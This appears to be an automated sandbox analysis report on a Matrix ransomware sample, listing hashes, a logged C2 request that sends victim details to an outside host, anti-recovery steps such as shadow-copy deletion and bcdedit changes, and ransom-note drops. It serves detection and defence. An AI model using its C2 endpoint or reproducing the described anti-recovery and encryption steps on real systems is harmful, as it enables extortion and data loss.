Analysis
-
max time kernel
150s -
max time network
133s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
05-03-2022 22:37
Static task
static1
Behavioral task
behavioral1
Sample
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe
Resource
win10v2004-en-20220113
General
-
Target
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe
-
Size
3.8MB
-
MD5
ac42a9b2338847bb398152b1bf6401fd
-
SHA1
02daf9ff6773da4d134c94fdb7630af2cc01e399
-
SHA256
3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63
-
SHA512
016c848cf8c2ffc1343d9242eaae19e9d41488f752282787f4f62cb841c121583f7673b21ddd7b624f39ef775c167fd2733eba495c84ebdf20103f09400e0ac1
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\plugins\codec\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_proxy\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\ProgramData\Microsoft\ClickToRun\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\L9S5YI1K\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Microsoft\EdgeCore\97.0.1072.55\edge_feedback\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\ProgramData\Oracle\Java\installcache_x64\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1pj39gsm.default-release\storage\permanent\chrome\idb\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Google\Update\Install\{84CFA618-79F5-4696-B800-674A92E6E151}\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Roaming\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\Music\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\WidevineCdm\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\3D Objects\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Public\Downloads\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Settings\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\Favorites\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\Contacts\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\ProgramData\Microsoft\ClickToRun\ProductReleases\3918A828-DCC1-45E2-BA7D-1BE47F748F29\en-us.16\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_chroma\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_splitter\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\swiftshader\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\db\lib\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ccaccf66-511b-468f-a3a1-e34659edc1f0}\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Office\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe HTTP URL 146 http://fredstat.000webhostapp.com/addrecord.php?apikey=anonapikey&compuser=JDQPXOPR|Admin&sid=2vr9cVU22SRTOzcB&phase=[ALL]3AD912A2EB478326 Process not Found -
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4596 bcdedit.exe 1936 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 149 3892 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS HH8cI51J64.exe -
Executes dropped EXE 3 IoCs
pid Process 2800 NWT8dVfc.exe 4592 HH8cI51J.exe 4212 HH8cI51J64.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\ConnectResolve.tiff 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000200000001e463-147.dat upx behavioral2/files/0x000200000001e463-148.dat upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation wscript.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 2144 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 26 IoCs
description ioc Process File opened for modification C:\Users\Admin\Links\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Music\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Music\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Documents\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Public\Videos\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: HH8cI51J64.exe File opened (read-only) \??\P: HH8cI51J64.exe File opened (read-only) \??\S: HH8cI51J64.exe File opened (read-only) \??\Z: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\A: HH8cI51J64.exe File opened (read-only) \??\I: HH8cI51J64.exe File opened (read-only) \??\X: HH8cI51J64.exe File opened (read-only) \??\Z: HH8cI51J64.exe File opened (read-only) \??\L: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\F: HH8cI51J64.exe File opened (read-only) \??\W: HH8cI51J64.exe File opened (read-only) \??\N: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\M: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\K: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\I: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\G: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\U: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\R: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\P: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\J: HH8cI51J64.exe File opened (read-only) \??\N: HH8cI51J64.exe File opened (read-only) \??\T: HH8cI51J64.exe File opened (read-only) \??\J: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\E: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\O: HH8cI51J64.exe File opened (read-only) \??\U: HH8cI51J64.exe File opened (read-only) \??\V: HH8cI51J64.exe File opened (read-only) \??\W: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\V: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\T: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\O: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\K: HH8cI51J64.exe File opened (read-only) \??\R: HH8cI51J64.exe File opened (read-only) \??\Y: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\X: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\S: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\F: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\B: HH8cI51J64.exe File opened (read-only) \??\L: HH8cI51J64.exe File opened (read-only) \??\G: HH8cI51J64.exe File opened (read-only) \??\M: HH8cI51J64.exe File opened (read-only) \??\Q: HH8cI51J64.exe File opened (read-only) \??\Y: HH8cI51J64.exe File opened (read-only) \??\Q: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\H: 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened (read-only) \??\E: HH8cI51J64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 148 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\BaI9ufue.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\LogoCanary.png 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-text.xml 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Google\Update\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\swiftshader\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jfxswt.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\97.0.1072.55\Locales\lo.pak 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\classlist 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_bn.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\RequestEnter.MTS 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\jawt.lib 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\pa.pak.DATA 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\ms.pak 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\demux\libts_plugin.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\spu\librss_plugin.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\Content.DATA 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\nl.pak.DATA 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program 